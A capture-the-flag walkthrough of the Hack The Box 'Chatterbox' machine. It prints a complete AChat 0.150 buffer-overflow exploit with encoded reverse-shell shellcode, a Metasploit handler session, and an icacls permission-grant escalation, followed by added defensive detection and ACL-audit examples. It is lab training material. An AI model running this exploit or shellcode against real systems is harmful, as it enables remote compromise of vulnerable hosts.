This box was just retired on Hackthebox.eu. It involves exploiting the infamous AChat application. Let's see how to get root on this machine!
Enumeration
As always, we start with an nmap scan:
[bash]
nmap -sV -sC -oA initial-nmap 10.10.10.74
[/bash]
The -sC option runs nmap's default scripts against the services it finds, while -sV probes open ports to determine which service and version is running on the box. The -oA option makes sure that the output of the scan is stored in all of nmap's main output formats.
This initial scan found 0 services. Let's cast the net a bit broader and scan all the ports on this machine:
[bash]
nmap -sV -sC -oA fullport-nmap -p- 10.10.10.74
[/bash]
As you can see, I've added the -p- option to scan all ports. We get some nice results back:
[bash]
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 22:40 CEST
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.33% done; ETC: 23:03 (0:22:19 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.69% done; ETC: 23:02 (0:20:19 remaining)
Stats: 0:10:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.10.74
Host is up (0.020s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
[/bash]
Exploitation
So we have AChat running on both port 9255 and 9256. Let's do a quick Google search on this piece of software. The SourceForge page linked to the project shows that the last commit was made in 2013, which brings the latest version to 0.150. We can safely assume that Chatterbox is running that version of AChat. Let's see what Exploit-DB has on this.
[bash]
searchsploit achat
--------------------------------------------------------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal | exploits/php/webapps/24647.txt
--------------------------------------------------------------------------------------
Shellcodes: No Result
[/bash]
We have multiple hits. Cool. Let's start by looking at the non-Metasploit exploit (36025.py):
[bash]
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 – Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes
buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('192.168.91.130', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
[/bash]
This PoC appears to be aimed at triggering a buffer overflow. Before we can test it, we have to edit a couple of things:
- The hex code is aimed at launching the calculator (calc.exe) instead of spawning a reverse shell. This is quite common for PoCs, but something to be taken into account. We can use msfvenom to create our own code.
- The current server address is pointing at 192.168.91.130. You need to change this to the IP of the machine you are performing the attack from.
Let's start by generating some hex code that we can use to set up a reverse shell. The PoC already states which msfvenom command was used to generate the payload:
[bash]
msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
[/bash]
Let's change this to something we can make work for ourselves:
[bash]
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 – Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9$
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x6b\x38\x55\x32"
buf += "\x69\x70\x4b\x50\x4b\x50\x71\x50\x75\x39\x47\x75\x4c"
buf += "\x71\x45\x70\x52\x44\x72\x6b\x72\x30\x50\x30\x44\x4b"
buf += "\x4e\x72\x7a\x6c\x42\x6b\x72\x32\x5a\x74\x72\x6b\x54"
buf += "\x32\x4b\x78\x7a\x6f\x46\x57\x30\x4a\x6c\x66\x6e\x51"
buf += "\x6b\x4f\x46\x4c\x6d\x6c\x31\x51\x71\x6c\x6b\x52\x6e"
buf += "\x4c\x6b\x70\x55\x71\x68\x4f\x4c\x4d\x49\x71\x36\x67"
buf += "\x6b\x32\x7a\x52\x30\x52\x72\x37\x34\x4b\x4f\x62\x4c"
buf += "\x50\x52\x6b\x6f\x5a\x6d\x6c\x32\x6b\x6e\x6c\x6a\x71"
buf += "\x73\x48\x48\x63\x4d\x78\x4a\x61\x57\x61\x6f\x61\x34"
buf += "\x4b\x30\x59\x4b\x70\x5a\x61\x76\x73\x42\x6b\x6e\x69"
buf += "\x4d\x48\x6b\x33\x6f\x4a\x70\x49\x72\x6b\x6d\x64\x74"
buf += "\x4b\x6a\x61\x36\x76\x4e\x51\x49\x6f\x36\x4c\x46\x61"
buf += "\x38\x4f\x4c\x4d\x49\x71\x39\x37\x6d\x68\x39\x50\x73"
buf += "\x45\x4b\x46\x49\x73\x71\x6d\x6b\x48\x4d\x6b\x71\x6d"
buf += "\x4b\x74\x61\x65\x57\x74\x62\x38\x72\x6b\x61\x48\x4d"
buf += "\x54\x6b\x51\x79\x43\x61\x56\x62\x6b\x4a\x6c\x70\x4b"
buf += "\x74\x4b\x70\x58\x6d\x4c\x6d\x31\x78\x53\x44\x4b\x7a"
buf += "\x64\x72\x6b\x4b\x51\x48\x50\x71\x79\x71\x34\x6f\x34"
buf += "\x6f\x34\x71\x4b\x71\x4b\x63\x31\x6e\x79\x6f\x6a\x70"
buf += "\x51\x39\x6f\x69\x50\x4f\x6f\x61\x4f\x71\x4a\x64\x4b"
buf += "\x6b\x62\x7a\x4b\x52\x6d\x6f\x6d\x53\x38\x4d\x63\x4d"
buf += "\x62\x6d\x30\x6d\x30\x43\x38\x54\x37\x51\x63\x4e\x52"
buf += "\x51\x4f\x4f\x64\x70\x68\x4e\x6c\x34\x37\x6b\x76\x6c"
buf += "\x47\x65\x39\x58\x68\x49\x6f\x5a\x30\x47\x48\x34\x50"
buf += "\x7a\x61\x6d\x30\x79\x70\x6d\x59\x37\x54\x70\x54\x4e"
buf += "\x70\x61\x58\x4b\x79\x71\x70\x32\x4b\x59\x70\x6b\x4f"
buf += "\x59\x45\x72\x4a\x6c\x4a\x63\x38\x5a\x6a\x69\x7a\x6e"
buf += "\x30\x6a\x78\x43\x38\x49\x72\x39\x70\x4c\x50\x62\x72"
buf += "\x51\x79\x6a\x46\x4e\x70\x30\x50\x32\x30\x72\x30\x31"
buf += "\x6b\x4f\x46\x4c\x6d\x6c\x31\x51\x71\x6c\x6b\x52\x6e"
buf += "\x4c\x6b\x70\x55\x71\x68\x4f\x4c\x4d\x49\x71\x36\x67"
buf += "\x6b\x32\x7a\x52\x30\x52\x72\x37\x34\x4b\x4f\x62\x4c"
buf += "\x50\x52\x6b\x6f\x5a\x6d\x6c\x32\x6b\x6e\x6c\x6a\x71"
buf += "\x73\x48\x48\x63\x4d\x78\x4a\x61\x57\x61\x6f\x61\x34"
buf += "\x4b\x30\x59\x4b\x70\x5a\x61\x76\x73\x42\x6b\x6e\x69"
buf += "\x4d\x48\x6b\x33\x6f\x4a\x70\x49\x72\x6b\x6d\x64\x74"
buf += "\x4b\x6a\x61\x36\x76\x4e\x51\x49\x6f\x36\x4c\x46\x61"
buf += "\x38\x4f\x4c\x4d\x49\x71\x39\x37\x6d\x68\x39\x50\x73"
buf += "\x45\x4b\x46\x49\x73\x71\x6d\x6b\x48\x4d\x6b\x71\x6d"
buf += "\x4b\x74\x61\x65\x57\x74\x62\x38\x72\x6b\x61\x48\x4d"
buf += "\x54\x6b\x51\x79\x43\x61\x56\x62\x6b\x4a\x6c\x70\x4b"
buf += "\x74\x4b\x70\x58\x6d\x4c\x6d\x31\x78\x53\x44\x4b\x7a"
buf += "\x64\x72\x6b\x4b\x51\x48\x50\x71\x79\x71\x34\x6f\x34"
buf += "\x6f\x34\x71\x4b\x71\x4b\x63\x31\x6e\x79\x6f\x6a\x70"
buf += "\x51\x39\x6f\x69\x50\x4f\x6f\x61\x4f\x71\x4a\x64\x4b"
buf += "\x6b\x62\x7a\x4b\x52\x6d\x6f\x6d\x53\x38\x4d\x63\x4d"
buf += "\x62\x6d\x30\x6d\x30\x43\x38\x54\x37\x51\x63\x4e\x52"
buf += "\x51\x4f\x4f\x64\x70\x68\x4e\x6c\x34\x37\x6b\x76\x6c"
buf += "\x47\x65\x39\x58\x68\x49\x6f\x5a\x30\x47\x48\x34\x50"
buf += "\x7a\x61\x6d\x30\x79\x70\x6d\x59\x37\x54\x70\x54\x4e"
buf += "\x70\x61\x58\x4b\x79\x71\x70\x32\x4b\x59\x70\x6b\x4f"
buf += "\x59\x45\x72\x4a\x6c\x4a\x63\x38\x5a\x6a\x69\x7a\x6e"
buf += "\x30\x6a\x78\x43\x38\x49\x72\x39\x70\x4c\x50\x62\x72"
buf += "\x51\x79\x6a\x46\x4e\x70\x30\x50\x32\x30\x72\x30\x31"
buf += "\x30\x50\x50\x6d\x70\x50\x50\x6f\x78\x69\x5a\x6c\x4f"
buf += "\x49\x4f\x59\x50\x39\x6f\x39\x45\x33\x67\x70\x6a\x4e"
buf += "\x30\x70\x56\x52\x37\x31\x58\x36\x39\x53\x75\x43\x44"
buf += "\x61\x51\x4b\x4f\x48\x55\x54\x45\x69\x30\x73\x44\x39"
buf += "\x7a\x4b\x4f\x70\x4e\x39\x78\x52\x55\x48\x6c\x67\x78"
buf += "\x71\x57\x6d\x30\x69\x70\x4b\x50\x50\x6a\x69\x70\x52"
buf += "\x4a\x59\x74\x50\x56\x62\x37\x31\x58\x6d\x32\x66\x79"
buf += "\x76\x68\x6f\x6f\x69\x6f\x49\x45\x51\x73\x6a\x58\x79"
buf += "\x70\x63\x4e\x4e\x56\x62\x6b\x4d\x66\x42\x4a\x71\x30"
buf += "\x52\x48\x6d\x30\x4a\x70\x79\x70\x6d\x30\x6f\x66\x32"
buf += "\x4a\x6d\x30\x73\x38\x32\x38\x44\x64\x4f\x63\x57\x75"
buf += "\x4b\x4f\x49\x45\x34\x53\x61\x43\x71\x5a\x59\x70\x50"
buf += "\x56\x70\x53\x52\x37\x62\x48\x4a\x62\x37\x69\x56\x68"
buf += "\x4f\x6f\x4b\x4f\x59\x45\x64\x43\x78\x78\x79\x70\x61"
buf += "\x6d\x4e\x48\x6f\x68\x71\x58\x59\x70\x61\x30\x6d\x30"
buf += "\x59\x70\x61\x5a\x59\x70\x32\x30\x61\x58\x6a\x6b\x6e"
buf += "\x4f\x5a\x6f\x50\x30\x59\x6f\x4a\x35\x32\x37\x61\x58"
buf += "\x74\x35\x62\x4e\x70\x4d\x4f\x71\x4b\x4f\x79\x45\x61"
buf += "\x4e\x6f\x6e\x39\x6f\x4a\x6c\x4b\x74\x7a\x6f\x44\x45"
buf += "\x74\x30\x69\x6f\x69\x6f\x4b\x4f\x6a\x49\x35\x4b\x59"
buf += "\x6f\x6b\x4f\x59\x6f\x6b\x51\x69\x33\x6c\x69\x48\x46"
buf += "\x63\x45\x79\x31\x66\x63\x65\x6b\x78\x70\x48\x35\x37"
buf += "\x32\x51\x46\x61\x5a\x4d\x30\x4e\x73\x49\x6f\x59\x45"
buf += "\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"
print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()
[/bash]
Set up a catcher for the reverse shell:
[bash]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 4242
LPORT => 4242
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.X:4242
msf exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.74
[*] Command shell session 1 opened (10.10.16.X:4242 -> 10.10.10.74:49178)
[/bash]
Aaaaaand:
[bash]
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1…
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
chatterbox\alfred
[/bash]
You can find the user key in the /Desktop folder.
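From the defender's side, the PoC above has a distinctive shape on the wire: more than 172,000 bytes of mostly single-byte filler pushed at UDP port 9256 in 8192-byte datagrams. The following is an added example, not part of the original write-up or of the AChat project, that flags that shape in captured datagrams; the thresholds, the function names and the sample traffic are assumptions constructed for illustration.

```python
from collections import defaultdict

ACHAT_UDP_PORT = 9256           # AChat port from the nmap output and the PoC
MAX_RUN = 256                   # assumption: longest repeated-byte run tolerated
MAX_BYTES = 64 * 1024           # assumption: bytes allowed per source per window
WINDOW_SECONDS = 10.0           # assumption: sliding window length


def longest_run(payload: bytes) -> int:
    """Length of the longest run of one repeated byte value."""
    best = run = 0
    prev = None
    for b in payload:
        run = run + 1 if b == prev else 1
        prev = b
        best = max(best, run)
    return best


def detect(datagrams):
    """datagrams: (timestamp, src_ip, dst_port, payload) tuples -> [(src, reason)]."""
    alerts, seen = [], set()
    recent = defaultdict(list)  # src -> [(timestamp, size)] still inside the window

    def alert(src, reason):
        if (src, reason) not in seen:   # one alert per source and reason
            seen.add((src, reason))
            alerts.append((src, reason))

    for ts, src, dport, payload in sorted(datagrams, key=lambda d: d[0]):
        if dport != ACHAT_UDP_PORT:
            continue
        if longest_run(payload) > MAX_RUN:
            alert(src, "filler")
        recent[src] = [(t, n) for t, n in recent[src] if ts - t <= WINDOW_SECONDS]
        recent[src].append((ts, len(payload)))
        if sum(n for _, n in recent[src]) > MAX_BYTES:
            alert(src, "volume")
    return alerts


def sample_traffic():
    """Constructed traffic: short messages, a non-AChat decoy, one PoC-shaped burst."""
    chat = [(float(i), "10.0.0.5", 9256, b"short message %d" % i) for i in range(5)]
    decoy = [(50.0, "10.0.0.7", 53, b"\x00" * 4000)]
    blob = b"A0000000002#Main\x00" + b"Z" * 114688   # filler only, no shellcode
    burst = [(100.0 + i * 0.01, "10.0.0.66", 9256, blob[o:o + 8192])
             for i, o in enumerate(range(0, len(blob), 8192))]
    return chat + decoy + burst
```

Both limits need tuning against real AChat traffic before use; the values here only separate the constructed samples.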
Privilege Escalation
Now, for root. How to proceed? One of the first things I always check on a Windows machine is the icacls settings. icacls stands for Integrity Control and Access Control List. It is a native Microsoft Windows command-line utility capable of displaying and modifying the security descriptors on folders and files. An access control list is a list of permissions for a securable object, such as a file or folder, that controls who can access it.
It seems that Alfred has ownership of the root flag, but cannot read it. By using icacls, we can change this:
[bash]
icacls.exe root.txt /grant CHATTERBOX\Alfred:F
[/bash]
We can then browse to the Desktop folder of the administrator, where we find root.txt. Thus concludes Chatterbox.
Check out this awesome video by Ippsec. He also explores how to get the same results using PowerShell Empire instead of Metasploit. Worth looking at!
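Why the icacls grant in the privilege escalation step works even though Alfred cannot read the file: unless the DACL contains an OWNER RIGHTS ACE, Windows implicitly gives an object's owner READ_CONTROL and WRITE_DAC. The following is an added example, not part of the original write-up, that models a simplified access check to show this and the condition a defender would audit for; the descriptor contents and all function names are assumptions, since the write-up does not show the real ACL.

```python
READ_CONTROL, WRITE_DAC = 0x00020000, 0x00040000
FILE_GENERIC_READ, FILE_ALL_ACCESS = 0x00120089, 0x001F01FF
OWNER_RIGHTS = "S-1-3-4"  # well-known OWNER RIGHTS SID (Vista and later)


def granted_mask(sd, token):
    """Rights a descriptor yields for a token (a set of user and group names)."""
    is_owner = sd["owner"] in token
    owner_ace = any(t == OWNER_RIGHTS for _, t, _ in sd["dacl"])
    # Without an OWNER RIGHTS ACE the owner implicitly holds these two rights.
    granted = (READ_CONTROL | WRITE_DAC) if is_owner and not owner_ace else 0
    denied = 0
    for kind, trustee, mask in sd["dacl"]:      # ACEs are evaluated in order
        if trustee in token or (trustee == OWNER_RIGHTS and is_owner):
            if kind == "allow":
                granted |= mask & ~denied
            else:
                denied |= mask & ~granted
    return granted


def can(sd, token, wanted):
    return (granted_mask(sd, token) & wanted) == wanted


def grant(sd, token, trustee, mask):
    """Model of `icacls <file> /grant trustee:F`: the caller needs WRITE_DAC."""
    if not can(sd, token, WRITE_DAC):
        raise PermissionError("WRITE_DAC not held")
    sd["dacl"].append(("allow", trustee, mask))


def owner_can_rewrite_dacl(sd, trusted_owners):
    """Audit check: an untrusted owner that still holds WRITE_DAC."""
    return sd["owner"] not in trusted_owners and can(sd, {sd["owner"]}, WRITE_DAC)


def sample_descriptor():
    """Constructed descriptor shaped like the write-up's root.txt, not real output."""
    return {"owner": r"CHATTERBOX\Alfred",
            "dacl": [("allow", r"BUILTIN\Administrators", FILE_ALL_ACCESS),
                     ("allow", r"NT AUTHORITY\SYSTEM", FILE_ALL_ACCESS)]}
```

Resetting the owner to an administrative principal, or adding an OWNER RIGHTS ACE that withholds WRITE_DAC, closes the path used here.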